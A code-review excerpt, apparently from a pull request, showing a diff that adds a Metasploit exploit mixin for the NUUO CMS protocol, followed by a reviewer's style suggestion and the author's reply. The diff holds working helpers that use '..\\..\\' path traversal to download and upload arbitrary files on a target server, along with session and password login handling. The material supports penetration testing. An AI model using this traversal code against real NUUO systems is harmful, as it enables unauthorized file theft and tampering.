lib/msf/core/exploit/remote/nuuo.rb

```diff
@@ -0,0 +1,237 @@
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => rport, 'Context' => ctx })
+      sock.write(format_msg(msg))
+      # socket cannot be closed, it causes exploits to fail...
+      #sock.close
+    rescue
+      return
+    end
+  end
+
+  ##
+  # Sends a protocol message synchronously - sends and returns the result
+  ##
+  def nucs_send_msg(msg)
+    begin
+      ctx = { 'Msf' => framework, 'MsfExploit' => self }
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => rport, 'Context' => ctx })
+      sock.write(format_msg(msg))
+      data = sock.recv(4096)
+      if data =~ /Content-Length:([0-9]+)/
+        data_sz = $1.to_i
+        more_data = ''
+        recv = 0
+        while recv < data_sz
+          new_data = sock.recv(4096)
+          more_data << new_data
+          recv += new_data.length
+        end
+      end
+      # socket cannot be closed, it causes exploits to fail...
+      #sock.close
+      return [data, more_data]
+    rescue
+      return ["",""]
+    end
+  end
+
+  ##
+  # Sends a protocol data message synchronously - sends and returns the result
+  # A data message is composed of two parts: first the message length and protocol headers,
+  # then the actual data.
+  ##
+  def nucs_send_data_msg(msg, data)
+    begin
+      ctx = { 'Msf' => framework, 'MsfExploit' => self }
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => rport, 'Context' => ctx })
+      sock.write(format_msg(msg))
+      sock.write(data)
+      data = sock.recv(4096)
+      if data =~ /Content-Length:([0-9]+)/
+        data_sz = $1.to_i
+        more_data = ''
+        recv = 0
+        while recv < data_sz
+          new_data = sock.recv(4096)
+          more_data << new_data
+          recv += new_data.length
+        end
+      end
+      # socket cannot be closed, it causes exploits to fail...
+      #sock.close
+      return [data, more_data]
+    rescue
+      return ["",""]
+    end
+  end
+
+  ##
+  # Downloads a file from the CMS install root.
+  # Add the ZIP extraction and decryption routine once support for it is added to msf.
+  ##
+  def nucs_download_file(filename, decrypt = false)
+    data = nucs_send_msg(["GETCONFIG", "FileName: ..\\..\\#{filename}", "FileType: 1"])
+    data[1]
+  end
+
+
+  ##
+  # Uploads a file to the CMS install root.
+  ##
+  def nucs_upload_file(filename, file_data)
+    data = nucs_send_data_msg(["COMMITCONFIG", "FileName: " + "..\\..\\#{filename}", "FileType: 1", "Content-Length: " + file_data.length.to_s], file_data)
+    if data[0] =~ /200/
+      true
+    else
+      false
+    end
+  end
+
+  def nucs_login
+    if datastore['SESSION'] != nil
+      # since we're logged in, we don't need to guess the version any more
+      @nucs_session = datastore['SESSION']
+    elsif datastore['PASSWORD'] != nil
+      @nucs_versions.shuffle.each do |version|
+        @nucs_version = version
+        data = login_password
+        if data == nil
```

Comment:
This conditional block:

```ruby
        if data == nil
          next
        else
          @nucs_session = data
          break
        end
```

Might be cleaner using a guard clause:

```ruby
        next if data.nil?
        @nucs_session = data
        break
```

It's slightly easier to read, especially given that this block is already deeply buried in spaghetti.

Reply:
Same as my comment above, makes it much more complicated to understand and read in my opinion